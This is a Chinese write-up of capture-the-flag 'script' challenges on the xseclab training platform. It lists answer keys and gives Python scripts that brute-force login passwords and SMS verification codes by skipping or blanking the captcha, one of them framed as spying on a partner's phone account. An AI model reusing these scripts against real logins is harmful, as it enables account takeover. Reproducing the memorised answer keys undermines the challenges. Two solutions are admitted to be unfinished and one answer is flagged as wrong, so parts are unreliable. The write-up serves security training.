网络安全实验室|网络信息安全攻防学习平台(脚本关)

1. 小明这次哭了,key又找不到了!!! key啊,你究竟藏到了哪里,为什么我看到的页面上都没有啊!!!!!

地址: http://lab1.xseclab.com/xss1_30ac8668cd453e7e387c76b132b140bb/index.php

正确答案: yougotit_script_now

答案解析:我们发现点击后又重定向了,在burpsuite的target里面我们看该目录的回应数据,可以发现key

如图:

网络安全实验室|网络信息安全攻防学习平台(脚本关)_第1张图片

 

2.快速口算:小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢? 

地址: http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php

正确答案: 123iohHKHJ%^&*(jkh

答案解析:这种需要使用脚本来获取key,因为只有2秒,不可能人来操作。python代码如下:

view plaincopy to clipboard

  1. import requests  
  2. import re  
  3. from selenium import webdriver  
  4. dirver=webdriver.Chrome()  
  5.   
  6. url="http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php"  
  7. dirver.get(url)#使用Chrome打开地址  
  8. res=dirver.page_source#读取页面代码  
  9. print("页面代码:\n%s" %res)  
  10. num=re.findall(r'[0-9+*()]+[)]',res)#获取计算式  
  11. result=eval(num[0].strip())#计算结果  
  12. print("计算结果:%s"%result)  
  13. dirver.find_element_by_name( "v").send_keys(result)#搜索输入框输入result  
  14. dirver.find_element_by_xpath( "html/body/form").submit()#点击提交按钮  
  15. res=dirver.page_source#读取页面代码  
  16. print("新页面代码:\n%s" %res)  

 

3.这个题目是空的

Tips:这个题目真不是随便设置的。 什么才是空的呢? 通关地址:没有,请直接提交答案(小写即可)

正确答案: null

答案解析:为空,而且必须输入,当然是null啊!

 

4.怎么就是弹不出key呢? 

提交说明:提交前14个字符即可过关 

地址: http://lab1.xseclab.com/xss3_5dcdde90bbe55087eb3514405972b1a6/index.php

正确答案: slakfjteslkjsd

答案解析:查看源码,发现前面有一个a函数返回失败,去掉这些返回为false的函数,然后在稍微修改下:

view plaincopy to clipboard

  1.   
  2.       
  3.           
  4.           
  5.       
  6.       
  7.         _点击之后怎么没反应呢?说好的弹窗呢?__  
  8.         

      
  9.       
  10.   

 

5.逗比验证码第一期:逗比的验证码,有没有难道不一样吗?  

地址: http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/index.php

正确答案: LJLJL789sdf#@sd

答案解析:这题想让我们暴力破解,而人工来破解的花至少2小时把,所以我用python来破解,代码如下:

view plaincopy to clipboard

  1. import requests  
  2. import re  
  3. s=requests.Session()  
  4. url="http://lab1.xseclab.com/vcode1_bcfef7eacf7badc64aaf18844cdb1c46/login.php"  
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}  
  6. for num in range(1000,10000):  
  7.            data={'username':'admin','pwd':num,'vcode':'GNZX','submit':'submit'}  
  8.            res=s.post(url,data=data,headers=head).content.decode('utf-8')  
  9.            if u'pwd error' in res:  
  10.                       print('正在尝试',num,'------密码错误!')  
  11.            if u'vcode error' in res:  
  12.                       print('验证码错误!')  
  13.                       break  
  14.            if u'error' not in res:  
  15.                       print(num,'----密码破解成功!')  
  16.                       print(res)  
  17.                       break  

 

6.逗比的验证码第二期:验证便失效的验证码 

地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php

正确答案: LJLJL789ss33fasvxcvsdf#@sd

答案解析:将验证码改为空即可

view plaincopy to clipboard

  1. import requests  
  2. import re  
  3. s=requests.Session()  
  4. url="http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/login.php"  
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}  
  6. for num in range(1000,10000):  
  7.            data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}  
  8.            res=s.post(url,data=data,headers=head).content.decode('utf-8')  
  9.            if u'pwd error' in res:  
  10.                       print('正在尝试',num,'------密码错误!')  
  11.            if u'vcode error' in res:  
  12.                       print('验证码错误!')  
  13.                       break  
  14.            if u'error' not in res:  
  15.                       print(num,'----密码破解成功!')  
  16.                       print(res)  
  17.                       break  

 

7.逗比的验证码第三期:验证便失效的验证码 

地址: http://lab1.xseclab.com/vcode2_a6e6bac0b47c8187b09deb20babc0e85/index.php

正确答案: LJLJLfuckvcodesdf#@sd

答案解析:将验证码去除,cookie改为session即可

view plaincopy to clipboard

  1. import requests  
  2. import re  
  3. s=requests.Session()  
  4. url="http://lab1.xseclab.com/vcode3_9d1ea7ad52ad93c04a837e0808b17097/login.php"  
  5. head={'session':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}  
  6. for num in range(1000,10000):  
  7.            data={'username':'admin','pwd':num,'vcode':'','submit':'submit'}  
  8.            res=s.post(url,data=data,headers=head).content.decode('utf-8')  
  9.            if u'pwd error' in res:  
  10.                       print('正在尝试',num,'------密码错误!')  
  11.            if u'vcode error' in res:  
  12.                       print('验证码错误!')  
  13.                       break  
  14.            if u'error' not in res:  
  15.                       print(num,'----密码破解成功!')  
  16.                       print(res)  
  17.                       break  

 

8.微笑一下就能通过拉!尼玛,碰到这样的题我能笑得出来嘛...  

地址: http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/index.php

正确答案: hkjasfhsa*&IUHKUH

答案解析:查看源代码我们可以发现一个超链接,打开这个超链接是PHP代码,观察后发现from是POST提交,PHP处理是GET,呵呵(●'?'●) 微笑

在后缀里面加?^.^=data:,(●'?'●) 即可

 

9. 逗比的手机验证码:你的手机号码是13388886666,验证码将会以弹窗的形式给出

地址: http://lab1.xseclab.com/vcode5_mobi_5773f3def9f77f439e058894cefc42a8/

正确答案: LJLJLGod!@@sd

答案解析:傻吊题啊,获取验证码登陆提示13388886667登陆,重新来就是

 

10.基情燃烧的岁月:你是一名黑客,你怀疑你的“(男/女)闺蜜”的出轨了,你要登陆TA手机的网上营业厅查看详单,一探究竟! 闺蜜手机号码:13388886666 

地址: http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/

正确答案: 13399999999

答案解析:用python来破解验证码:

view plaincopy to clipboard

  1. import requests  
  2. import re  
  3. s=requests.Session()  
  4. url="http://lab1.xseclab.com/vcode6_mobi_b46772933eb4c8b5175c67dbc44d8901/login.php"  
  5. head={'cookie':'PHPSESSID=d369965b1284d87405231a4a5763cddc'}  
  6. for num in range(100,1000):  
  7.            data={'username':'13388886666','vcode':num,'Login':'submit'}  
  8.            res=s.post(url,data=data,headers=head).content.decode('utf-8')  
  9.            if u'vcode or username error' in res:  
  10.                       print('正在尝试',num,'------验证码错误!')  
  11.            if u'error' not in res:  
  12.                       print(num,'----验证码破解成功!')  
  13.                       print(res)  
  14.                       break  

但是不知道为什么答案还是错的!

 

11.验证码识别 Tips:验证码依然是3位数

地址: http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/index.php

正确答案: 

答案解析:暂时没弄出来

 

12.XSS基础:很容易就可以过关.XSS类题目必须在平台登录才能进行.登录地址请参考左侧<子系统>

地址: http://lab1.xseclab.com/realxss1_f123c17dd9c363334670101779193998/index.php

正确答案:

 

答案解析:暂时没弄出来

你可能感兴趣的:(CTF比赛)